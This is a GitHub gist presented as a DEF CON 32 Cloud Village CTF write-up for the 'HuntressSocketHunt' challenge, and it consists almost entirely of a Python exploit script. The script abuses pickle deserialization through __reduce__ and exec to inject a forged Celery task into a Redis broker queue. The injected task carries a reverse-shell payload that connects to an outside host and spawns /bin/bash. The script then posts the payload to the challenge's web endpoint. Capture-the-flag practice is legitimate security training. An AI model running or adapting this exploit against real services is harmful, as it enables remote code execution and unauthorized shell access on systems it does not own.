Created
August 14, 2024 12:32
-
-
Save tyage/1d47e60c84b9880e93182dd3c6773a96 to your computer and use it in GitHub Desktop.
HuntressScketHunt writeup - DEF CON 32 Cloud Village CTF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pickle | |
| import base64 | |
| import requests | |
| import json | |
| import os | |
| class P(object): | |
| def __reduce__(self): | |
| return (exec,('import socket,os,pty;s=socket.socket();s.connect(("xx.xx.xx.xx",4242));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")',)) | |
| arg = ([ | |
| {'huntress_name': '1111', 'weapon_type': 'Fire', 'weapon_name': 'abc', 'test': P()} | |
| ], {}, {'callbacks': None, 'errbacks': None, 'chain': None, 'chord': None} | |
| ) | |
| rce = base64.b64encode(pickle.dumps(arg)).decode() | |
| payload = "{\"body\": \""+rce+"\", \"content-encoding\": \"binary\", \"content-type\": \"application/x-python-serialize\", \"headers\": {\"lang\": \"py\", \"task\": \"app.tasks.go_on_a_journey\", \"id\": \"e80d44e0-5170-4488-bda8-bf3fe571050c\", \"shadow\": null, \"eta\": null, \"expires\": null, \"group\": null, \"group_index\": null, \"retries\": 0, \"timelimit\": [null, null], \"root_id\": \"e80d44e0-5170-4488-bda8-bf3fe571050c\", \"parent_id\": null, \"argsrepr\": \"[]\", \"kwargsrepr\": \"{}\", \"origin\": \"gen90704@local\", \"ignore_result\": false, \"replaced_task_nesting\": 0, \"stamped_headers\": null, \"stamps\": {}}, \"properties\": {\"correlation_id\": \"e80d44e0-5170-4488-bda8-bf3fe571050c\", \"reply_to\": \"5eafeab0-d12b-3ab1-a4cd-e4fa791a2a64\", \"delivery_mode\": 2, \"delivery_info\": {\"exchange\": \"\", \"routing_key\": \"celery\"}, \"priority\": 0, \"body_encoding\": \"base64\", \"delivery_tag\": \"7db17528-39c5-4ff6-ae5a-dc3aa9c3f206\"}}" | |
| class P(object): | |
| def __reduce__(self): | |
| return (exec,(''' | |
| import subprocess; | |
| import base64; | |
| cli = redis.StrictRedis.from_url(app.config["CELERY_BROKER_URL"]); | |
| result = cli.delete("celery"); | |
| result = cli.lpush("celery", '{}'); | |
| result = cli.lrange("celery", 0, -1); | |
| raise Exception(result); | |
| '''.format(payload),)) | |
| payload = base64.b64encode(pickle.dumps(P())).decode() | |
| res = requests.post('https://huntresssockethunt-77c04986b4988c31f0e732c2b0b26a1e-0000.us-south.containers.appdomain.cloud/fight', json={ | |
| 'monsters': payload, | |
| 'index': 0, | |
| 'power': 50 | |
| }) | |
| data = json.loads(res.text) | |
| print(data['message']) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment